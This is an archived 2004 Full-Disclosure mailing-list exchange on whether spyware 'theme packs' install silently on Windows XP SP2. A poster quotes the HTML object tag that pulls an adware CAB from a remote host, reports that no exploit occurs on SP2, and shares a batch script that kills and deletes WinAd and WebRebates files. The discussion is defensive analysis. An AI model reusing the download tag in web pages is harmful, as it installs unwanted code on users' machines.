lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0203A1F683E317458D5F226DAA571333080333@ptle2m04.up.corp.upc>
From: ACastigliola at unumprovident.com (Castigliola, Angelo)
Subject: Spyware installs ... XP SP2 box

Thank you for the test Raize. I appreciate your time.

>One must assume that you are installing these "theme packs" via some
BHO (Browser Helper Object) that you
>installed previously or put the site on the "Always trust content from
this provider". Perhaps someone 
>else can explain where I am missing the exploit, because a quick glance
over seems to indicate there is 
>none for XP SP2. (I did not test this on SP1)

I think you are right. It seems the only person that was not prompted
for the install that was not running SP2 was the original author of this
thread who said that it was a previously visited site.

As far as users running SP1 there is no security warning that says an
executable is about to be installed. There is no Microsoft Update that
will prevent this from loading. Like most large organizations just
jumping to SP2 is not an option. It needs go though rigorous testing to
make sure it complies with all of our internal software.

Angelo Castigliola III
Operations Technical Analyst I
UnumProvident IT Services
207.575.3820
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of raize
Sent: Tuesday, October 05, 2004 9:29 AM
To: full-disclosure@...ts.netsys.com
Subject: Re: [Full-Disclosure] Spyware installs ... XP SP2 box


The installed code is definitely:

<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
HEIGHT=0 WIDTH=0></object>

However, there is no exploit here. I loaded this with a default honeypot
image of XPSP2 with IE as an Admin and nothing else installed other than
the drop down that asked me if I really wanted to trust this site for
installing an executable.

One must assume that you are installing these "theme packs" via some BHO
(Browser Helper Object) that you installed previously or put the site on
the "Always trust content from this provider". Perhaps someone else can
explain where I am missing the exploit, because a quick glance over
seems to indicate there is none for XP SP2. (I did not test this on SP1)

Spybot and Ad-aware do not catch and kill WinRebates and WinAd
spy/adware properly, but I have a batch command that will do it for you.
Included is a .zip of each IP contacted along with full URL request and
output. It also contains the contents of this email and the batch file
with these commands: (You'll want to rename the .txt to .bat)

--------------------------------------------
cd "C:\Program Files\Winad Client"
taskkill /T /F /IM WinClt.exe
taskkill /T /F /IM WinAd.exe
erase WinClt.exe
erase WinAd.exe
cd ..
cd Web_Rebates
taskkill /T /F /IM WebRebates0.exe
taskkill /T /F /IM WebRebates1.exe
erase WebRebates0.exe
erase WebRebates1.exe
cd ..
rd /Q /S "Winad Client"
rd /Q /S "Web_Rebates"
cd "C:\Windows\system32"
taskkill /T /F /IM fjdria.exe
taskkill /T /F /IM ezSP_Px.exe
erase fjdria.exe
erase ezSP_Px.exe


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ